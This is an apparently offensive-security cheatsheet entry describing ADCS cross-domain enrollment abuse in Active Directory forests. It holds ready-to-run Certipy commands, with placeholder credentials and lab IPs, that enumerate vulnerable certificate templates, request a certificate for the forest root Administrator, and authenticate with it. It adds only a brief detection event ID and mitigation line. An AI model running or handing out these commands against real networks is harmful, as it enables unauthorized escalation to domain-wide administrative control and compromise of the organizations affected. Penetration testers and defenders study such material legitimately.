daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-70-adcs-cross-domain-enrollment.md (2933B)


      1 ---
      2 title: "Attack #70 β€” ADCS Cross-Domain Enrollment"
      3 description: "When ADCS is deployed in a multi-domain forest, certificate enrollment often uses Enterprise CAs that serve the entire forest. A user from a child domain…"
      4 category: active-directory
      5 subcategory: "Trust Abuse"
      6 tags: ["active-directory", "adcs", "hashing"]
      7 tools: ["Certipy"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Nine/πŸ”Ά Attack #70 β€” ADCS Cross-Domain Enrollment.md"
     11 ---
     12 # πŸ”Ά Attack #70 β€” ADCS Cross-Domain Enrollment
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 When ADCS is deployed in a multi-domain forest, certificate enrollment often uses **Enterprise CAs** that serve the entire forest. A user from a child domain can enroll for certificates from the forest root's CA β€” and if a vulnerable template exists (ESC1-ESC8), they can request a certificate for any user in the forest, including Enterprise Admins in the root domain. This provides a **cross-domain escalation path** without needing the child domain's KRBTGT hash.
     19 
     20 ***
     21 
     22 ## βš™οΈ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Enterprise CA serving multiple domains** | Standard in most multi-domain forests |
     27 | **Vulnerable cert template** | ESC1/ESC2/ESC4 etc. accessible from child domain |
     28 | **Child domain user credentials** | Any authenticated user |
     29 
     30 ***
     31 
     32 ## πŸ’» Full Commands
     33 
     34 ```bash
     35 # ── Enumerate cross-domain CAs ────────────────────────────────────────────────
     36 certipy find -u user@child.corp.local -p 'Password1' -dc-ip 10.10.10.20 \
     37   -vulnerable -stdout
     38 # Look for: CAs from parent domain with vulnerable templates
     39 
     40 # ── Exploit ESC1 cross-domain ─────────────────────────────────────────────────
     41 certipy req -u user@child.corp.local -p 'Password1' -ca ROOT-CA \
     42   -template VulnTemplate -upn Administrator@corp.local \
     43   -dc-ip 10.10.10.10 -target ROOT-CA.corp.local
     44 
     45 # ── Authenticate as forest root Administrator ─────────────────────────────────
     46 certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
     47 ```
     48 
     49 ***
     50 
     51 ## πŸ›‘οΈ Detection β€” Event IDs
     52 
     53 | Event ID | Source | What to Look For |
     54 |---|---|---|
     55 | **4886** | Security Log (CA) | Enrollment from child domain user targeting parent domain identity |
     56 
     57 ***
     58 
     59 ## πŸ”— Attack Chain Context
     60 
     61 ```
     62 [ADCS Cross-Domain] ──→ Enroll for forest root cert from child domain
     63          β”‚
     64          β”œβ”€β”€β†’ πŸ”— No KRBTGT needed β€” pure ADCS escalation path
     65          β”œβ”€β”€β†’ πŸ”— Combines with ESC1-ESC8 from Category 4
     66          └──→ πŸ’€ Defeated by: harden ADCS templates, restrict enrollment across domains
     67 ```
     68 
     69 ***
     70 
     71 > βœ… **Attack #70 β€” ADCS Cross-Domain Enrollment complete.**